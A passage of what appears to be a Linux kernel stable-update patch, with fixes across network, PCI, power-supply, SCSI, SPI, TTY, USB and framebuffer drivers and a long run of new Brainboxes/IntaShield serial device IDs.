+ 					break;
+@@ -4058,6 +4062,9 @@ static int rtl_phy_patch_request(struct r8152 *tp, bool request, bool wait)
+ 	for (i = 0; wait && i < 5000; i++) {
+ 		u32 ocp_data;
+ 
++		if (test_bit(RTL8152_UNPLUG, &tp->flags))
++			break;
++
+ 		usleep_range(1000, 2000);
+ 		ocp_data = ocp_reg_read(tp, OCP_PHY_PATCH_STAT);
+ 		if ((ocp_data & PATCH_READY) ^ check)
+diff --git a/drivers/pci/quirks.c b/drivers/pci/quirks.c
+index 472fa2c8ebcec..30e7c627f21a7 100644
+--- a/drivers/pci/quirks.c
++++ b/drivers/pci/quirks.c
+@@ -595,7 +595,7 @@ DECLARE_PCI_FIXUP_FINAL(PCI_VENDOR_ID_ATI,	PCI_DEVICE_ID_ATI_RS100,   quirk_ati_
+ /*
+  * In the AMD NL platform, this device ([1022:7912]) has a class code of
+  * PCI_CLASS_SERIAL_USB_XHCI (0x0c0330), which means the xhci driver will
+- * claim it.
++ * claim it. The same applies on the VanGogh platform device ([1022:163a]).
+  *
+  * But the dwc3 driver is a more specific driver for this device, and we'd
+  * prefer to use it instead of xhci. To prevent xhci from claiming the
+@@ -603,7 +603,7 @@ DECLARE_PCI_FIXUP_FINAL(PCI_VENDOR_ID_ATI,	PCI_DEVICE_ID_ATI_RS100,   quirk_ati_
+  * defines as "USB device (not host controller)". The dwc3 driver can then
+  * claim it based on its Vendor and Device ID.
+  */
+-static void quirk_amd_nl_class(struct pci_dev *pdev)
++static void quirk_amd_dwc_class(struct pci_dev *pdev)
+ {
+ 	u32 class = pdev->class;
+ 
+@@ -613,7 +613,9 @@ static void quirk_amd_nl_class(struct pci_dev *pdev)
+ 		 class, pdev->class);
+ }
+ DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_AMD, PCI_DEVICE_ID_AMD_NL_USB,
+-		quirk_amd_nl_class);
++		quirk_amd_dwc_class);
++DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_AMD, PCI_DEVICE_ID_AMD_VANGOGH_USB,
++		quirk_amd_dwc_class);
+ 
+ /*
+  * Synopsys USB 3.x host HAPS platform has a class code of
+diff --git a/drivers/platform/mellanox/mlxbf-tmfifo.c b/drivers/platform/mellanox/mlxbf-tmfifo.c
+index a04ff89a7ec44..9925a6d94affc 100644
+--- a/drivers/platform/mellanox/mlxbf-tmfifo.c
++++ b/drivers/platform/mellanox/mlxbf-tmfifo.c
+@@ -588,24 +588,25 @@ static void mlxbf_tmfifo_rxtx_word(struct mlxbf_tmfifo_vring *vring,
+ 
+ 	if (vring->cur_len + sizeof(u64) <= len) {
+ 		/* The whole word. */
+-		if (!IS_VRING_DROP(vring)) {
+-			if (is_rx)
++		if (is_rx) {
++			if (!IS_VRING_DROP(vring))
+ 				memcpy(addr + vring->cur_len, &data,
+ 				       sizeof(u64));
+-			else
+-				memcpy(&data, addr + vring->cur_len,
+-				       sizeof(u64));
++		} else {
++			memcpy(&data, addr + vring->cur_len,
++			       sizeof(u64));
+ 		}
+ 		vring->cur_len += sizeof(u64);
+ 	} else {
+ 		/* Leftover bytes. */
+-		if (!IS_VRING_DROP(vring)) {
+-			if (is_rx)
++		if (is_rx) {
++			if (!IS_VRING_DROP(vring))
+ 				memcpy(addr + vring->cur_len, &data,
+ 				       len - vring->cur_len);
+-			else
+-				memcpy(&data, addr + vring->cur_len,
+-				       len - vring->cur_len);
++		} else {
++			data = 0;
++			memcpy(&data, addr + vring->cur_len,
++			       len - vring->cur_len);
+ 		}
+ 		vring->cur_len = len;
+ 	}
+diff --git a/drivers/power/supply/power_supply_core.c b/drivers/power/supply/power_supply_core.c
+index 7871ab5e979c0..ac88c9636b663 100644
+--- a/drivers/power/supply/power_supply_core.c
++++ b/drivers/power/supply/power_supply_core.c
+@@ -29,7 +29,7 @@
+ struct class *power_supply_class;
+ EXPORT_SYMBOL_GPL(power_supply_class);
+ 
+-ATOMIC_NOTIFIER_HEAD(power_supply_notifier);
++BLOCKING_NOTIFIER_HEAD(power_supply_notifier);
+ EXPORT_SYMBOL_GPL(power_supply_notifier);
+ 
+ static struct device_type power_supply_dev_type;
+@@ -97,7 +97,7 @@ static void power_supply_changed_work(struct work_struct *work)
+ 		class_for_each_device(power_supply_class, NULL, psy,
+ 				      __power_supply_changed_work);
+ 		power_supply_update_leds(psy);
+-		atomic_notifier_call_chain(&power_supply_notifier,
++		blocking_notifier_call_chain(&power_supply_notifier,
+ 				PSY_EVENT_PROP_CHANGED, psy);
+ 		kobject_uevent(&psy->dev.kobj, KOBJ_CHANGE);
+ 		spin_lock_irqsave(&psy->changed_lock, flags);
+@@ -1112,13 +1112,13 @@ static void power_supply_dev_release(struct device *dev)
+ 
+ int power_supply_reg_notifier(struct notifier_block *nb)
+ {
+-	return atomic_notifier_chain_register(&power_supply_notifier, nb);
++	return blocking_notifier_chain_register(&power_supply_notifier, nb);
+ }
+ EXPORT_SYMBOL_GPL(power_supply_reg_notifier);
+ 
+ void power_supply_unreg_notifier(struct notifier_block *nb)
+ {
+-	atomic_notifier_chain_unregister(&power_supply_notifier, nb);
++	blocking_notifier_chain_unregister(&power_supply_notifier, nb);
+ }
+ EXPORT_SYMBOL_GPL(power_supply_unreg_notifier);
+ 
+diff --git a/drivers/scsi/mpt3sas/mpt3sas_scsih.c b/drivers/scsi/mpt3sas/mpt3sas_scsih.c
+index 8e24ebcebfe52..2ea3bdc638177 100644
+--- a/drivers/scsi/mpt3sas/mpt3sas_scsih.c
++++ b/drivers/scsi/mpt3sas/mpt3sas_scsih.c
+@@ -12914,8 +12914,10 @@ _mpt3sas_init(void)
+ 	mpt3sas_ctl_init(hbas_to_enumerate);
+ 
+ 	error = pci_register_driver(&mpt3sas_driver);
+-	if (error)
++	if (error) {
++		mpt3sas_ctl_exit(hbas_to_enumerate);
+ 		scsih_exit();
++	}
+ 
+ 	return error;
+ }
+diff --git a/drivers/spi/spi-npcm-fiu.c b/drivers/spi/spi-npcm-fiu.c
+index 49f6424e35af0..0624f52880705 100644
+--- a/drivers/spi/spi-npcm-fiu.c
++++ b/drivers/spi/spi-npcm-fiu.c
+@@ -353,8 +353,9 @@ static int npcm_fiu_uma_read(struct spi_mem *mem,
+ 		uma_cfg |= ilog2(op->cmd.buswidth);
+ 		uma_cfg |= ilog2(op->addr.buswidth)
+ 			<< NPCM_FIU_UMA_CFG_ADBPCK_SHIFT;
+-		uma_cfg |= ilog2(op->dummy.buswidth)
+-			<< NPCM_FIU_UMA_CFG_DBPCK_SHIFT;
++		if (op->dummy.nbytes)
++			uma_cfg |= ilog2(op->dummy.buswidth)
++				<< NPCM_FIU_UMA_CFG_DBPCK_SHIFT;
+ 		uma_cfg |= ilog2(op->data.buswidth)
+ 			<< NPCM_FIU_UMA_CFG_RDBPCK_SHIFT;
+ 		uma_cfg |= op->dummy.nbytes << NPCM_FIU_UMA_CFG_DBSIZ_SHIFT;
+diff --git a/drivers/tty/n_gsm.c b/drivers/tty/n_gsm.c
+index 4b43589304704..6b6abce6b69f4 100644
+--- a/drivers/tty/n_gsm.c
++++ b/drivers/tty/n_gsm.c
+@@ -3404,6 +3404,8 @@ static int gsm_modem_upd_via_msc(struct gsm_dlci *dlci, u8 brk)
+ 
+ static int gsm_modem_update(struct gsm_dlci *dlci, u8 brk)
+ {
++	if (dlci->gsm->dead)
++		return -EL2HLT;
+ 	if (dlci->adaption == 2) {
+ 		/* Send convergence layer type 2 empty data frame. */
+ 		gsm_modem_upd_via_data(dlci, brk);
+diff --git a/drivers/tty/serial/8250/8250_pci.c b/drivers/tty/serial/8250/8250_pci.c
+index 0ea89df6702f6..38fb7126ab0ef 100644
+--- a/drivers/tty/serial/8250/8250_pci.c
++++ b/drivers/tty/serial/8250/8250_pci.c
+@@ -2447,6 +2447,153 @@ static struct pci_serial_quirk pci_serial_quirks[] = {
+ 		.init			= pci_oxsemi_tornado_init,
+ 		.setup		= pci_oxsemi_tornado_setup,
+ 	},
++	/*
++	 * Brainboxes devices - all Oxsemi based
++	 */
++	{
++		.vendor		= PCI_VENDOR_ID_INTASHIELD,
++		.device		= 0x4027,
++		.subvendor	= PCI_ANY_ID,
++		.subdevice	= PCI_ANY_ID,
++		.init		= pci_oxsemi_tornado_init,
++		.setup		= pci_oxsemi_tornado_setup,
++	},
++	{
++		.vendor		= PCI_VENDOR_ID_INTASHIELD,
++		.device		= 0x4028,
++		.subvendor	= PCI_ANY_ID,
++		.subdevice	= PCI_ANY_ID,
++		.init		= pci_oxsemi_tornado_init,
++		.setup		= pci_oxsemi_tornado_setup,
++	},
++	{
++		.vendor		= PCI_VENDOR_ID_INTASHIELD,
++		.device		= 0x4029,
++		.subvendor	= PCI_ANY_ID,
++		.subdevice	= PCI_ANY_ID,
++		.init		= pci_oxsemi_tornado_init,
++		.setup		= pci_oxsemi_tornado_setup,
++	},
++	{
++		.vendor		= PCI_VENDOR_ID_INTASHIELD,
++		.device		= 0x4019,
++		.subvendor	= PCI_ANY_ID,
++		.subdevice	= PCI_ANY_ID,
++		.init		= pci_oxsemi_tornado_init,
++		.setup		= pci_oxsemi_tornado_setup,
++	},
++	{
++		.vendor		= PCI_VENDOR_ID_INTASHIELD,
++		.device		= 0x4016,
++		.subvendor	= PCI_ANY_ID,
++		.subdevice	= PCI_ANY_ID,
++		.init		= pci_oxsemi_tornado_init,
++		.setup		= pci_oxsemi_tornado_setup,
++	},
++	{
++		.vendor		= PCI_VENDOR_ID_INTASHIELD,
++		.device		= 0x4015,
++		.subvendor	= PCI_ANY_ID,
++		.subdevice	= PCI_ANY_ID,
++		.init		= pci_oxsemi_tornado_init,
++		.setup		= pci_oxsemi_tornado_setup,
++	},
++	{
++		.vendor		= PCI_VENDOR_ID_INTASHIELD,
++		.device		= 0x400A,
++		.subvendor	= PCI_ANY_ID,
++		.subdevice	= PCI_ANY_ID,
++		.init		= pci_oxsemi_tornado_init,
++		.setup		= pci_oxsemi_tornado_setup,
++	},
++	{
++		.vendor		= PCI_VENDOR_ID_INTASHIELD,
++		.device		= 0x400E,
++		.subvendor	= PCI_ANY_ID,
++		.subdevice	= PCI_ANY_ID,
++		.init		= pci_oxsemi_tornado_init,
++		.setup		= pci_oxsemi_tornado_setup,
++	},
++	{
++		.vendor		= PCI_VENDOR_ID_INTASHIELD,
++		.device		= 0x400C,
++		.subvendor	= PCI_ANY_ID,
++		.subdevice	= PCI_ANY_ID,
++		.init		= pci_oxsemi_tornado_init,
++		.setup		= pci_oxsemi_tornado_setup,
++	},
++	{
++		.vendor		= PCI_VENDOR_ID_INTASHIELD,
++		.device		= 0x400B,
++		.subvendor	= PCI_ANY_ID,
++		.subdevice	= PCI_ANY_ID,
++		.init		= pci_oxsemi_tornado_init,
++		.setup		= pci_oxsemi_tornado_setup,
++	},
++	{
++		.vendor		= PCI_VENDOR_ID_INTASHIELD,
++		.device		= 0x400F,
++		.subvendor	= PCI_ANY_ID,
++		.subdevice	= PCI_ANY_ID,
++		.init		= pci_oxsemi_tornado_init,
++		.setup		= pci_oxsemi_tornado_setup,
++	},
++	{
++		.vendor		= PCI_VENDOR_ID_INTASHIELD,
++		.device		= 0x4010,
++		.subvendor	= PCI_ANY_ID,
++		.subdevice	= PCI_ANY_ID,
++		.init		= pci_oxsemi_tornado_init,
++		.setup		= pci_oxsemi_tornado_setup,
++	},
++	{
++		.vendor		= PCI_VENDOR_ID_INTASHIELD,
++		.device		= 0x4011,
++		.subvendor	= PCI_ANY_ID,
++		.subdevice	= PCI_ANY_ID,
++		.init		= pci_oxsemi_tornado_init,
++		.setup		= pci_oxsemi_tornado_setup,
++	},
++	{
++		.vendor		= PCI_VENDOR_ID_INTASHIELD,
++		.device		= 0x401D,
++		.subvendor	= PCI_ANY_ID,
++		.subdevice	= PCI_ANY_ID,
++		.init		= pci_oxsemi_tornado_init,
++		.setup		= pci_oxsemi_tornado_setup,
++	},
++	{
++		.vendor		= PCI_VENDOR_ID_INTASHIELD,
++		.device		= 0x401E,
++		.subvendor	= PCI_ANY_ID,
++		.subdevice	= PCI_ANY_ID,
++		.init		= pci_oxsemi_tornado_init,
++		.setup		= pci_oxsemi_tornado_setup,
++	},
++	{
++		.vendor		= PCI_VENDOR_ID_INTASHIELD,
++		.device		= 0x4013,
++		.subvendor	= PCI_ANY_ID,
++		.subdevice	= PCI_ANY_ID,
++		.init		= pci_oxsemi_tornado_init,
++		.setup		= pci_oxsemi_tornado_setup,
++	},
++	{
++		.vendor		= PCI_VENDOR_ID_INTASHIELD,
++		.device		= 0x4017,
++		.subvendor	= PCI_ANY_ID,
++		.subdevice	= PCI_ANY_ID,
++		.init		= pci_oxsemi_tornado_init,
++		.setup		= pci_oxsemi_tornado_setup,
++	},
++	{
++		.vendor		= PCI_VENDOR_ID_INTASHIELD,
++		.device		= 0x4018,
++		.subvendor	= PCI_ANY_ID,
++		.subdevice	= PCI_ANY_ID,
++		.init		= pci_oxsemi_tornado_init,
++		.setup		= pci_oxsemi_tornado_setup,
++	},
+ 	{
+ 		.vendor         = PCI_VENDOR_ID_INTEL,
+ 		.device         = 0x8811,
+@@ -4931,6 +5078,12 @@ static const struct pci_device_id serial_pci_tbl[] = {
+ 		0, 0,
+ 		pbn_b1_bt_1_115200 },
+ 
++	/*
++	 * IntaShield IS-100
++	 */
++	{	PCI_VENDOR_ID_INTASHIELD, 0x0D60,
++		PCI_ANY_ID, PCI_ANY_ID, 0, 0,
++		pbn_b2_1_115200 },
+ 	/*
+ 	 * IntaShield IS-200
+ 	 */
+@@ -4943,6 +5096,27 @@ static const struct pci_device_id serial_pci_tbl[] = {
+ 	{	PCI_VENDOR_ID_INTASHIELD, PCI_DEVICE_ID_INTASHIELD_IS400,
+ 		PCI_ANY_ID, PCI_ANY_ID, 0, 0,    /* 135a.0dc0 */
+ 		pbn_b2_4_115200 },
++	/*
++	 * IntaShield IX-100
++	 */
++	{	PCI_VENDOR_ID_INTASHIELD, 0x4027,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_oxsemi_1_15625000 },
++	/*
++	 * IntaShield IX-200
++	 */
++	{	PCI_VENDOR_ID_INTASHIELD, 0x4028,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_oxsemi_2_15625000 },
++	/*
++	 * IntaShield IX-400
++	 */
++	{	PCI_VENDOR_ID_INTASHIELD, 0x4029,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_oxsemi_4_15625000 },
+ 	/* Brainboxes Devices */
+ 	/*
+ 	* Brainboxes UC-101
+@@ -4958,10 +5132,14 @@ static const struct pci_device_id serial_pci_tbl[] = {
+ 		PCI_ANY_ID, PCI_ANY_ID,
+ 		0, 0,
+ 		pbn_b2_1_115200 },
++	{	PCI_VENDOR_ID_INTASHIELD, 0x0AA2,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_b2_1_115200 },
+ 	/*
+-	 * Brainboxes UC-257
++	 * Brainboxes UC-253/UC-734
+ 	 */
+-	{	PCI_VENDOR_ID_INTASHIELD, 0x0861,
++	{	PCI_VENDOR_ID_INTASHIELD, 0x0CA1,
+ 		PCI_ANY_ID, PCI_ANY_ID,
+ 		0, 0,
+ 		pbn_b2_2_115200 },
+@@ -4997,6 +5175,14 @@ static const struct pci_device_id serial_pci_tbl[] = {
+ 		PCI_ANY_ID, PCI_ANY_ID,
+ 		0, 0,
+ 		pbn_b2_2_115200 },
++	{	PCI_VENDOR_ID_INTASHIELD, 0x08E2,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_b2_2_115200 },
++	{	PCI_VENDOR_ID_INTASHIELD, 0x08E3,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_b2_2_115200 },
+ 	/*
+ 	 * Brainboxes UC-310
+ 	 */
+@@ -5007,6 +5193,14 @@ static const struct pci_device_id serial_pci_tbl[] = {
+ 	/*
+ 	 * Brainboxes UC-313
+ 	 */
++	{       PCI_VENDOR_ID_INTASHIELD, 0x08A1,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_b2_2_115200 },
++	{       PCI_VENDOR_ID_INTASHIELD, 0x08A2,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_b2_2_115200 },
+ 	{       PCI_VENDOR_ID_INTASHIELD, 0x08A3,
+ 		PCI_ANY_ID, PCI_ANY_ID,
+ 		0, 0,
+@@ -5021,6 +5215,10 @@ static const struct pci_device_id serial_pci_tbl[] = {
+ 	/*
+ 	 * Brainboxes UC-346
+ 	 */
++	{	PCI_VENDOR_ID_INTASHIELD, 0x0B01,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_b2_4_115200 },
+ 	{	PCI_VENDOR_ID_INTASHIELD, 0x0B02,
+ 		PCI_ANY_ID, PCI_ANY_ID,
+ 		0, 0,
+@@ -5032,6 +5230,10 @@ static const struct pci_device_id serial_pci_tbl[] = {
+ 		PCI_ANY_ID, PCI_ANY_ID,
+ 		0, 0,
+ 		pbn_b2_2_115200 },
++	{	PCI_VENDOR_ID_INTASHIELD, 0x0A82,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_b2_2_115200 },
+ 	{	PCI_VENDOR_ID_INTASHIELD, 0x0A83,
+ 		PCI_ANY_ID, PCI_ANY_ID,
+ 		0, 0,
+@@ -5044,12 +5246,94 @@ static const struct pci_device_id serial_pci_tbl[] = {
+ 		0, 0,
+ 		pbn_b2_4_115200 },
+ 	/*
+-	 * Brainboxes UC-420/431
++	 * Brainboxes UC-420
+ 	 */
+ 	{       PCI_VENDOR_ID_INTASHIELD, 0x0921,
+ 		PCI_ANY_ID, PCI_ANY_ID,
+ 		0, 0,
+ 		pbn_b2_4_115200 },
++	/*
++	 * Brainboxes UC-607
++	 */
++	{	PCI_VENDOR_ID_INTASHIELD, 0x09A1,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_b2_2_115200 },
++	{	PCI_VENDOR_ID_INTASHIELD, 0x09A2,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_b2_2_115200 },
++	{	PCI_VENDOR_ID_INTASHIELD, 0x09A3,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_b2_2_115200 },
++	/*
++	 * Brainboxes UC-836
++	 */
++	{	PCI_VENDOR_ID_INTASHIELD, 0x0D41,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_b2_4_115200 },
++	/*
++	 * Brainboxes UP-189
++	 */
++	{	PCI_VENDOR_ID_INTASHIELD, 0x0AC1,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_b2_2_115200 },
++	{	PCI_VENDOR_ID_INTASHIELD, 0x0AC2,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_b2_2_115200 },
++	{	PCI_VENDOR_ID_INTASHIELD, 0x0AC3,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_b2_2_115200 },
++	/*
++	 * Brainboxes UP-200
++	 */
++	{	PCI_VENDOR_ID_INTASHIELD, 0x0B21,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_b2_2_115200 },
++	{	PCI_VENDOR_ID_INTASHIELD, 0x0B22,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_b2_2_115200 },
++	{	PCI_VENDOR_ID_INTASHIELD, 0x0B23,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_b2_2_115200 },
++	/*
++	 * Brainboxes UP-869
++	 */
++	{	PCI_VENDOR_ID_INTASHIELD, 0x0C01,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_b2_2_115200 },
++	{	PCI_VENDOR_ID_INTASHIELD, 0x0C02,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_b2_2_115200 },
++	{	PCI_VENDOR_ID_INTASHIELD, 0x0C03,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_b2_2_115200 },
++	/*
++	 * Brainboxes UP-880
++	 */
++	{	PCI_VENDOR_ID_INTASHIELD, 0x0C21,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_b2_2_115200 },
++	{	PCI_VENDOR_ID_INTASHIELD, 0x0C22,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_b2_2_115200 },
++	{	PCI_VENDOR_ID_INTASHIELD, 0x0C23,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_b2_2_115200 },
+ 	/*
+ 	 * Brainboxes PX-101
+ 	 */
+@@ -5082,7 +5366,7 @@ static const struct pci_device_id serial_pci_tbl[] = {
+ 	{	PCI_VENDOR_ID_INTASHIELD, 0x4015,
+ 		PCI_ANY_ID, PCI_ANY_ID,
+ 		0, 0,
+-		pbn_oxsemi_4_15625000 },
++		pbn_oxsemi_2_15625000 },
+ 	/*
+ 	 * Brainboxes PX-260/PX-701
+ 	 */
+@@ -5090,6 +5374,13 @@ static const struct pci_device_id serial_pci_tbl[] = {
+ 		PCI_ANY_ID, PCI_ANY_ID,
+ 		0, 0,
+ 		pbn_oxsemi_4_15625000 },
++	/*
++	 * Brainboxes PX-275/279
++	 */
++	{	PCI_VENDOR_ID_INTASHIELD, 0x0E41,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_b2_8_115200 },
+ 	/*
+ 	 * Brainboxes PX-310
+ 	 */
+@@ -5137,16 +5428,38 @@ static const struct pci_device_id serial_pci_tbl[] = {
+ 		0, 0,
+ 		pbn_oxsemi_4_15625000 },
+ 	/*
+-	 * Brainboxes PX-803
++	 * Brainboxes PX-475
++	 */
++	{	PCI_VENDOR_ID_INTASHIELD, 0x401D,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_oxsemi_1_15625000 },
++	/*
++	 * Brainboxes PX-803/PX-857
+ 	 */
+ 	{	PCI_VENDOR_ID_INTASHIELD, 0x4009,
+ 		PCI_ANY_ID, PCI_ANY_ID,
+ 		0, 0,
+-		pbn_b0_1_115200 },
++		pbn_b0_2_115200 },
++	{	PCI_VENDOR_ID_INTASHIELD, 0x4018,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_oxsemi_2_15625000 },
+ 	{	PCI_VENDOR_ID_INTASHIELD, 0x401E,
+ 		PCI_ANY_ID, PCI_ANY_ID,
+ 		0, 0,
+-		pbn_oxsemi_1_15625000 },
++		pbn_oxsemi_2_15625000 },
++	/*
++	 * Brainboxes PX-820
++	 */
++	{	PCI_VENDOR_ID_INTASHIELD, 0x4002,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_b0_4_115200 },
++	{	PCI_VENDOR_ID_INTASHIELD, 0x4013,
++		PCI_ANY_ID, PCI_ANY_ID,
++		0, 0,
++		pbn_oxsemi_4_15625000 },
+ 	/*
+ 	 * Brainboxes PX-846
+ 	 */
+diff --git a/drivers/usb/gadget/legacy/raw_gadget.c b/drivers/usb/gadget/legacy/raw_gadget.c
+index e549022642e56..ea106ad665a1f 100644
+--- a/drivers/usb/gadget/legacy/raw_gadget.c
++++ b/drivers/usb/gadget/legacy/raw_gadget.c
+@@ -663,12 +663,12 @@ static int raw_process_ep0_io(struct raw_dev *dev, struct usb_raw_ep_io *io,
+ 	if (WARN_ON(in && dev->ep0_out_pending)) {
+ 		ret = -ENODEV;
+ 		dev->state = STATE_DEV_FAILED;
+-		goto out_done;
++		goto out_unlock;
+ 	}
+ 	if (WARN_ON(!in && dev->ep0_in_pending)) {
+ 		ret = -ENODEV;
+ 		dev->state = STATE_DEV_FAILED;
+-		goto out_done;
++		goto out_unlock;
+ 	}
+ 
+ 	dev->req->buf = data;
+@@ -683,7 +683,7 @@ static int raw_process_ep0_io(struct raw_dev *dev, struct usb_raw_ep_io *io,
+ 				"fail, usb_ep_queue returned %d\n", ret);
+ 		spin_lock_irqsave(&dev->lock, flags);
+ 		dev->state = STATE_DEV_FAILED;
+-		goto out_done;
++		goto out_queue_failed;
+ 	}
+ 
+ 	ret = wait_for_completion_interruptible(&dev->ep0_done);
+@@ -692,13 +692,16 @@ static int raw_process_ep0_io(struct raw_dev *dev, struct usb_raw_ep_io *io,
+ 		usb_ep_dequeue(dev->gadget->ep0, dev->req);
+ 		wait_for_completion(&dev->ep0_done);
+ 		spin_lock_irqsave(&dev->lock, flags);
+-		goto out_done;
++		if (dev->ep0_status == -ECONNRESET)
++			dev->ep0_status = -EINTR;
++		goto out_interrupted;
+ 	}
+ 
+ 	spin_lock_irqsave(&dev->lock, flags);
+-	ret = dev->ep0_status;
+ 
+-out_done:
++out_interrupted:
++	ret = dev->ep0_status;
++out_queue_failed:
+ 	dev->ep0_urb_queued = false;
+ out_unlock:
+ 	spin_unlock_irqrestore(&dev->lock, flags);
+@@ -1067,7 +1070,7 @@ static int raw_process_ep_io(struct raw_dev *dev, struct usb_raw_ep_io *io,
+ 				"fail, usb_ep_queue returned %d\n", ret);
+ 		spin_lock_irqsave(&dev->lock, flags);
+ 		dev->state = STATE_DEV_FAILED;
+-		goto out_done;
++		goto out_queue_failed;
+ 	}
+ 
+ 	ret = wait_for_completion_interruptible(&done);
+@@ -1076,13 +1079,16 @@ static int raw_process_ep_io(struct raw_dev *dev, struct usb_raw_ep_io *io,
+ 		usb_ep_dequeue(ep->ep, ep->req);
+ 		wait_for_completion(&done);
+ 		spin_lock_irqsave(&dev->lock, flags);
+-		goto out_done;
++		if (ep->status == -ECONNRESET)
++			ep->status = -EINTR;
++		goto out_interrupted;
+ 	}
+ 
+ 	spin_lock_irqsave(&dev->lock, flags);
+-	ret = ep->status;
+ 
+-out_done:
++out_interrupted:
++	ret = ep->status;
++out_queue_failed:
+ 	ep->urb_queued = false;
+ out_unlock:
+ 	spin_unlock_irqrestore(&dev->lock, flags);
+diff --git a/drivers/usb/storage/unusual_cypress.h b/drivers/usb/storage/unusual_cypress.h
+index 0547daf116a26..5df40759d77ad 100644
+--- a/drivers/usb/storage/unusual_cypress.h
++++ b/drivers/usb/storage/unusual_cypress.h
+@@ -19,7 +19,7 @@ UNUSUAL_DEV(  0x04b4, 0x6831, 0x0000, 0x9999,
+ 		"Cypress ISD-300LP",
+ 		USB_SC_CYP_ATACB, USB_PR_DEVICE, NULL, 0),
+ 
+-UNUSUAL_DEV( 0x14cd, 0x6116, 0x0160, 0x0160,
++UNUSUAL_DEV( 0x14cd, 0x6116, 0x0150, 0x0160,
+ 		"Super Top",
+ 		"USB 2.0  SATA BRIDGE",
+ 		USB_SC_CYP_ATACB, USB_PR_DEVICE, NULL, 0),
+diff --git a/drivers/usb/typec/tcpm/tcpm.c b/drivers/usb/typec/tcpm/tcpm.c
+index ad4d0314d27fa..5e9d0c695fdb7 100644
+--- a/drivers/usb/typec/tcpm/tcpm.c
++++ b/drivers/usb/typec/tcpm/tcpm.c
+@@ -1616,6 +1616,9 @@ static int tcpm_pd_svdm(struct tcpm_port *port, struct typec_altmode *adev,
+ 			if (PD_VDO_VID(p[0]) != USB_SID_PD)
+ 				break;
+ 
++			if (IS_ERR_OR_NULL(port->partner))
++				break;
++
+ 			if (PD_VDO_SVDM_VER(p[0]) < svdm_version) {
+ 				typec_partner_set_svdm_version(port->partner,
+ 							       PD_VDO_SVDM_VER(p[0]));
+diff --git a/drivers/video/fbdev/aty/atyfb_base.c b/drivers/video/fbdev/aty/atyfb_base.c
+index b3463d1371520..faaa64fa5dfe9 100644
+--- a/drivers/video/fbdev/aty/atyfb_base.c
++++ b/drivers/video/fbdev/aty/atyfb_base.c
+@@ -3447,11 +3447,15 @@ static int atyfb_setup_generic(struct pci_dev *pdev, struct fb_info *info,
+ 	}
+ 
+ 	info->fix.mmio_start = raddr;
++#if defined(__i386__) || defined(__ia64__)
+ 	/*
+ 	 * By using strong UC we force the MTRR to never have an
+ 	 * effect on the MMIO region on both non-PAT and PAT systems.
+ 	 */
+ 	par->ati_regbase = ioremap_uc(info->fix.mmio_start, 0x1000);
++#else
++	par->ati_regbase = ioremap(info->fix.mmio_start, 0x1000);
++#endif
+ 	if (par->ati_regbase == NULL)
+ 		return -ENOMEM;
+ 
+diff --git a/drivers/video/fbdev/omap/omapfb_main.c b/drivers/video/fbdev/omap/omapfb_main.c
+index 17cda57656838..5ea7c52baa5a8 100644
+--- a/drivers/video/fbdev/omap/omapfb_main.c
++++ b/drivers/video/fbdev/omap/omapfb_main.c
+@@ -1643,13 +1643,13 @@ static int omapfb_do_probe(struct platform_device *pdev,
+ 	}
+ 	fbdev->int_irq = platform_get_irq(pdev, 0);
+ 	if (fbdev->int_irq < 0) {
+-		r = ENXIO;
++		r = -ENXIO;
+ 		goto cleanup;
+ 	}
+ 
+ 	fbdev->ext_irq = platform_get_irq(pdev, 1);
+ 	if (fbdev->ext_irq < 0) {
+-		r = ENXIO;
++		r = -ENXIO;
+ 		goto cleanup;
+ 	}
+ 
+diff --git a/drivers/video/fbdev/uvesafb.c b/drivers/video/fbdev/uvesafb.c
+index 0e3cabbec4b40..a85463db9f986 100644
+--- a/drivers/video/fbdev/uvesafb.c
++++ b/drivers/video/fbdev/uvesafb.c
+@@ -1935,10 +1935,10 @@ static void uvesafb_exit(void)
+ 		}
+ 	}
+ 
+-	cn_del_callback(&uvesafb_cn_id);
+ 	driver_remove_file(&uvesafb_driver.driver, &driver_attr_v86d);
+ 	platform_device_unregister(uvesafb_device);
+ 	platform_driver_unregister(&uvesafb_driver);
++	cn_del_callback(&uvesafb_cn_id);
+ }
+ 
